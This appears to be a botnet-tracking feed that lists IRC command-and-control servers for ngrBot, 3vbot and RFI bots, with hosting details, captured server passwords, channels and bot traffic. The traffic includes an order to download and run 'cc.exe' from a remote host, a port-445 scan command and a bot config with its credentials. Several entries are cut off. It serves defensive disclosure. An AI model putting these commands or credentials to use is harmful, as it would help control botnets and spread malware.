Remote Host Port Number 213.202.225.40 80 213.202.225.48 80 74.206.242.164 80 46.45.164.166 81 IRCD HERE NICK [N00_USA_XP_8072956] JOIN #c MODE [00_USA_XP_9406831] -ix USER SP2-351 * 0 :COMPUTERNAME PRIVMSG #bs :HTTP SET http://46.45.164.163/cc.exe PRIVMSG #c :scan; Sequential Port Scan started on 174.133.89.0:445 with a delay of 5 seconds for 0 minutes using 15 threads. PRIVMSG #c :scan;Read more...
188.190.96.148(irc botnet hosted in Ukraine Infium Ltd)
Remote Host Port Number 188.190.96.148 8087 PASS bich99 199.15.234.7 80 NICK n{US|XPa}mlqlmaj USER mlqlmaj 0 0 :mlqlmaj JOIN #cash bich99 JOIN #US hosting infos: http://whois.domaintools.com/188.190.96.148
178.63.199.34(3vbot hosted in Germany Gunzenhausen Hetzner Online Ag)
Remote Host Port Number 178.63.199.34 6667 199.15.234.7 80 NICK New{US-XP-x86}4687226 USER 4687226 “” “4687226” :4687226 MODE New{US-XP-x86}4687226 +iMm JOIN #|3vbot|# PONG :irc.priv8net.com hosting infos: http://whois.domaintools.com/178.63.199.34
java.alb-team.com(linux bots hosted in United States Ft. Lee Righthosting.com)
albanian lamers hosting rfi bots for ddos var $config = array(“server”=>”java.alb-team.com”, “port”=>4242, “pass”=>””, // “prefix”=>””, “maxrand”=>7, “chan”=>”#bote”, “key”=>”142536”, // “modes”=>”-x+i”, “password”=>”bomp”, // “trigger”=>”!say@”, “hostauth”=>”*” // * hosting infos: http://whois.domaintools.com/66.78.3.76
87.251.154.156(ngrBot hosted in Russian Federation Moscow Anders Telecom Ltd)
Remote Host Port Number 199.15.234.7 80 87.251.154.156 1890 PASS r00l NICK n{US|XPa}mqecvfh USER mqecvfh 0 0 :mqecvfh JOIN #bots r00l
latincrew.biz(ngrBot hosted in Russian Federation Moscow Oao Webalta)
Resolved : [latincrew.biz] To [92.241.165.124] Other domains used to control bots: xsstorm.com 87.255.51.229 latincrew.biz 92.241.165.124 gu1d3sh3n.cz.cc 178.238.36.17 92.241.165.124 1234 PASS xxx NICK NEW-[USA|00|P|01507] USER XP-5713 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|01507] -ix JOIN #!nw! test PONG 22 MOTD exe file: Download Download UPDATE: 64.202.107.109 1234 Now talking in #!nw! Topic On: [ #!nw! ] [ .g.fRead more...
xD.a7aneek.net(80-100k ngrBotnet hosted in France Paris Gandi)
Same lamer with big net and still hosting with Gandi.net Resolved : [xD.a7aneek.net] To [92.243.17.156] Resolved : [xD.a7aneek.net] To [92.243.25.164] Resolved : [xD.a7aneek.net] To [92.243.0.109] Resolved : [xD.a7aneek.net] To [92.243.27.72] Resolved : [xD.a7aneek.net] To [92.243.10.12] Other domain names used to control bots: xD.0dayx.com appupdate.org xD.0days.me 92.243.10.12 5900 PASS ngrBot 92.243.0.109 5900 PASS ngrBot 92.243.27.72 5900Read more...
213.175.194.128(ngrBot hosted in United Kingdom Durham Eukhost Ltd)
Remote Host Port Number 199.15.234.7 80 213.175.194.128 8000 PASS ngrBot NICK n{US|XPa}lomkpuv USER lomkpuv 0 0 :lomkpuv JOIN ##putotimador## ngrBot hosting infos: http://whois.domaintools.com/213.175.194.128
shoe.mrkva.su(ngrBot hosted in Netherlands Dediserv Dedicated Servers Sp. Z O.o)
same guy as update.jebac.net he keep changing domains lol shoe.mrkva.su 212.7.214.129 Remote Host Port Number 199.15.234.7 80 212.7.214.129 2087 PASS carmex UPDATE: Resolved : [shoe.mrkva.su] To [212.7.214.3] Server: 212.7.214.3:2087 PASS carmex Server Password: Username: ztaisun Nickname: n{DE|XPa}ztaisun Channel: #!s! (Password: carmex) Channeltopic: :!mod usbi on UPDATE: Server:shoe.mrkva.su:2086 channel:#!proxy! Local users: Current Local Users: 563 Max:Read more...
67.202.92.95(irc botnet hosted in United States Steadfast Networks)
Remote Host Port Number 67.202.92.95 2345 NICK New[USA|00|P|58651] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-8084 * 0 :COMPUTERNAME MODE New[USA|00|P|58651] -ix JOIN #!loco! PONG 22 MOTD hosting infos: http://whois.domaintools.com/67.202.92.95